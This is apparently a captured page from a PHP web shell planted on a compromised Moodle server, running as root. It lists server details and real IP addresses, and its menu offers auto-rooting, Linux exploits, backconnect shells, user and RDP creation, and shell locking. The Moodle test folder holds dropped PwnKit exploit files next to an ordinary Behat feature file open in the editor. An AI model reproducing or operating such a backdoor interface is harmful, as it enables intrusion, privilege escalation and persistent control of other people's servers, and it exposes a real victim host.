Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
chat /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
chat_calendar_events.feature
1.9
KB
-rwxrwxrwx
chat_course_reset.feature
2.25
KB
-rwxrwxrwx
chat_no_calendar_capabilities....
1.72
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chat_course_reset.feature
@mod @mod_chat Feature: Chat reset In order to reuse past chat activities As a teacher I need to remove all previous data. Background: Given the following "users" exist: | username | firstname | lastname | email | | teacher1 | Tina | Teacher1 | teacher1@example.com | | student1 | Sam | Student1 | student1@example.com | And the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "course enrolments" exist: | user | course | role | | teacher1 | C1 | editingteacher | | student1 | C1 | student | And the following "activities" exist: | activity | name | Description | course | idnumber | | chat | Test chat name | Test chat description | C1 | chat1 | Scenario: Use course reset to update chat start date And I log in as "teacher1" And I am on "Course 1" course homepage with editing mode on And I navigate to "Edit settings" in current page administration And I set the following fields to these values: | startdate[day] | 1 | | startdate[month] | January | | startdate[year] | 2020 | And I press "Save and display" And I follow "Test chat name" And I navigate to "Edit settings" in current page administration And I set the following fields to these values: | chattime[day] | 1 | | chattime[month] | January | | chattime[year] | 2020 | | chattime[hour] | 12 | | chattime[minute] | 00 | And I press "Save and display" And I am on "Course 1" course homepage When I navigate to "Reset" in current page administration And I set the following fields to these values: | reset_start_date[enabled] | 1 | | reset_start_date[day] | 1 | | reset_start_date[month] | January | | reset_start_date[year] | 2030 | And I press "Reset course" And I should see "Date changed" in the "Chats" "table_row" And I press "Continue" Then I am on "Course 1" course homepage And I follow "Test chat name" And I navigate to "Edit settings" in current page administration And I expand all fieldsets And the "chattime[year]" select box should contain "2030"
Close